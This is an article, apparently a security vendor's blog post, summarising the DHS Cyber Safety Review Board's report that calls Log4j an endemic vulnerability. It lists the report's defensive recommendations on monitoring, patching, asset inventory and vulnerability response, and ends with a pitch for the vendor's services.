Considered an ‘Endemic Vulnerability’, DHS Reports
The Cyber Safety Review Board (CSRB), a panel established by the Department of Homeland Security (DHS) in February, released a warning that the Apache Log4j flaw has evolved into an “endemic vulnerability” and will continue to plague organizations for years to come. The panel is composed of private and public sector industry leaders tasked by the DHS to identify key lessons and non-binding recommendations from significant cybersecurity events.
The CSRB engaged with almost 80 organizations to understand how the vulnerability has been or is still being mitigated. The board is also tasked to develop actionable recommendations for preventing and effectively responding to future incidents such as this. This announcement comes with a 52-page report – the first of its kind by the CSRB – detailing the exploitation, mitigation efforts and systemic security challenges to the ecosystem surrounding the December 2021 Log4j event.
Broken down into three sections, the report provides factual information on the vulnerability and what happened, the findings and conclusions based on an analysis of the facts, and a list of recommendations. The 19 actionable recommendations are subdivided into four categories: (1) Address the continued risks from theLog4j vulnerabilities; (2) Drive existing best practices for security hygiene; (3) Build a better software ecosystem; and (4) Identify worthwhile future investments.
Here are the key takeaways from the newly released report to help public and private sector organizations mitigate severe vulnerabilities.
Proactive and Consistent Monitoring
Exploitation levels of the Log4j flaw will continue to persist and evolve long after the dust has settled. The board recommends organizations to proactively monitor for and update systems vulnerable to the Log4j flaw. Likewise, federal agencies should report any observed Log4j exploitation instances to CISA, said the CSRB.
“The Board predicts that, given the ubiquity of Log4j, vulnerable versions will remain in systems for the next decade, and we will see exploitation evolve to effectively take advantage of the weaknesses.”
Patching Exploited Vulnerabilities
Organizations impacted by the Log4j flaw have faced a rocky mitigation and patching process. The time, money and resources needed for responding to the flaw have often had a financial impact on companies and delayed other mission-critical security tasks, including responding to other flaws. One federal cabinet department spent over 33,000 hours responding to the Log4j flaw, the CSRB found.
“The impact to organizations over the long term will be difficult to assess without better tools for discerning real exploitation and centralized reporting of successful compromises,” according to the report.
Long-tail Log4j Scenario
“The ‘long-tail’ scenario outlined in the report is one we’ve seen with countless past vulnerabilities, and one that favors attackers since their success is based on having at least one victim who hasn’t patched their systems,” said Tim Mackey, principal security strategist at the Synopsys Cybersecurity Research Center.
“Given management of open source software is different than commercial software, and open source powers commercial software, reliance on a commercial vendor to alert consumers of a problem presumes that the vendor is properly managing their usage of open source and that they are able to identify and alert all users of their impacted software – even if support for that software has ended.”
Accurate Asset Inventory
One of the most important recommendations is to create and maintain an accurate IT asset inventory, as vulnerabilities cannot be addressed if it is not known where the vulnerabilities exist. It is essential to have a complete software bill of materials (SBOM) that includes all third-party software components and dependencies used in software solutions.
Enhanced Security Risk Assessment
One of the biggest problems with addressing the Log4j vulnerabilities is understanding associated digital security risks. The report also recommends enterprises develop a vulnerability response program and a vulnerability disclosure and handling process and suggests the U.S. government investigate whether a Software Security Risk Assessment Center of Excellence is viable.
Managed Detection and Response (MDR)
Organizations are encouraged to finetune their security operations with Cybersecurity Incident Response Service (CIRS) providers offering ongoing training and Managed Detection and Response (MDR) services to ensure the attacker doesn’t regain entry.
MDRs cover vulnerability management, including investing in vulnerability scanning technologies used to identify vulnerable systems; maintaining asset and application inventories and creating a vulnerability response program and vulnerability disclosure and handling processes. A capable CIRS provider goes beyond systems solutions by supporting reputational recovery needs and solving security gaps in the long-term.
Get Ahead of Risks the Right Way
“Log4j remains deeply embedded in systems, and even within the short period available for our review, community stakeholders have identified new compromises, new threat actors, and new learnings,” CSRB warns. “We must remain vigilant against the risks associated with this vulnerability, and apply the best practices described in this review.”
Monitoring and managing security to respond to evolving threats like the Log4j bug is a continuous battle and should be part of your ongoing operational strategy. Reach out to our cybersecurity team today to perform a complete risk assessment of your digital infrastructure and build a resilient security posture against various threats.